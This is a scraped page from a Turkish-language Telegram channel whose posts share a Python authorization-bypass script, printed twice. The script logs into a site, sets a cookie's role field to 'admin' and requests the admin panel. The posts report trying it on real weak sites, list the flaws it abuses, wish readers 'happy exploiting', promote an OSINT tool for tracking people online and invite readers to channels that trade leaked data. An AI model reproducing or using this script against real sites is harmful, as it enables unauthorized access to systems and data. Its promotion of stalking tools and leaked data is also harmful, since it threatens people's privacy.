M Ü H Ü R
Закрытый канал
Нет данных
Подписчики
-424 часа
+17 дней
+5430 дней
Архив постов
SELAM DOSTLAR 🙌🏻
LOCKER'ın sizler için yazdığı Cookie Manipülasyonu ile Yetki Bypass kodunu bazı gelişmemiş sitelerde test ettik ve kodun bazı sitelerde çalıştığını fark ettik. Bu kodun hangi zaafiyetler de çalıştığını sizler için listeledik.
🔓 Zaafiyetleri aktarıyorum: 1.) Insecure Direct Object Reference (IDOR) 2.) Broken Access Control 3.) Insecure Cookie Handling 4.) Missing Authentication / Authorization 5.) Improper Session Management 6.) Lack of Input Validation / Server-side ValidationEvet, LOCKER'ın sizler için yazdığı bu bypass kodu genel olarak bu zaafiyetleri barındıran sitelerde çalışıyor. Tabii bu bir ihtimal bu zaafiyet olsa bile bazı durumlarda çalışmama gibi durumlar oluyor. Orasını da deneyerek bulacaksınız. Hepinize iyi sömürmeler 🧛🏻♂️
Bu Jhon The Ripper benzeri çalışan bir sosyal medya OSINT aracıdır. Girdiğiniz kullanıcı adının hangi platformlarda bulunduğunu araştırmanıza yarar. Açık kaynaklı bir İstihbarat Tooludur. Açık kaynak atmamın nedeni dilerseniz daha fazla platform ekleyebilmeniz içindir. Siber Güvenlik Uzmanlarınında sıkça kullandığı Jhon The Ripper aracını Terminalde kurma zahmetinden kurtacak olan bu program birini İnternette takip etmek için bire bir.
Repost from N/a
👑 Her türlü verinin paylaşıldığı kanalımıza davetlisiniz 📌
https://t.me/+pnK8EyKEkyNmNDU0
Selamün aleyküm dostlar bir OSINT projesi üzerinde çalışıyorum akşama doğru detayları ile kanalda paylaşmış olurum. Beklemede kalın bomba gibi bir araç gelecek 👍🏻🔥
Web sitelerinde bulunan admin panellerini tespit etmek için kullanılan bir program.- İyi kullanımlar dilerim. ❤️
@swareleak dostlar data paylaşımları olacaktır bi önceki patlayan kanal baya bi ilgi görüyordu, umarım şimdide görür herkesi beklerim....
import requests
giris_url = "Kullanici_girisi_url"
giris_verisi = {
"kullanici_adi": "senin_kullanici_adin",
"sifre": "senin_sifren",
}
oturum = requests.Session()
cevap = oturum.post(giris_url, data=giris_verisi)
çerezler = oturum.cookies.get_dict()
print(f"Orijinal Çerez: {çerezler}")
çerezler["rol"] = "admin"
print(f"Manipüle Edilmiş Çerez: {çerezler}")
admin_paneli_url = "admin_paneli_url"
cevap = requests.get(admin_paneli_url, cookies=çerezler)
if cevap.status_code == 200:
print("Yönetici paneline erişim sağlandı!")
print(cevap.text)
else:
print(f"Erişim sağlanamadı, durum kodu: {cevap.status_code}")
Bu bir Cookie manipüle etme kodudur. Sitenin size verdiği kimliği bir admin kimliğine çevirerek admin giriş bilgilerini Bypass etmenize yarar. Henüz test etmedim işin o kısmı artık sizde bunun yanında @Dev_Ech0 sizler için bir admin paneli bulma kodu hazırlıyor. Yani sitenizi belirleyin admin paneli bulmak için gerekli kodu Dev Echo sizler için sağlayacak.import requests
giris_url = "Kullanici_girisi_url"
giris_verisi = {
"kullanici_adi": "senin_kullanici_adin",
"sifre": "senin_sifren",
}
oturum = requests.Session()
cevap = oturum.post(giris_url, data=giris_verisi)
çerezler = oturum.cookies.get_dict()
print(f"Orijinal Çerez: {çerezler}")
çerezler["rol"] = "admin"
print(f"Manipüle Edilmiş Çerez: {çerezler}")
admin_paneli_url = "admin_paneli_url"
cevap = requests.get(admin_paneli_url, cookies=çerezler)
if cevap.status_code == 200:
print("Yönetici paneline erişim sağlandı!")
print(cevap.text)
else:
print(f"Erişim sağlanamadı, durum kodu: {cevap.status_code}")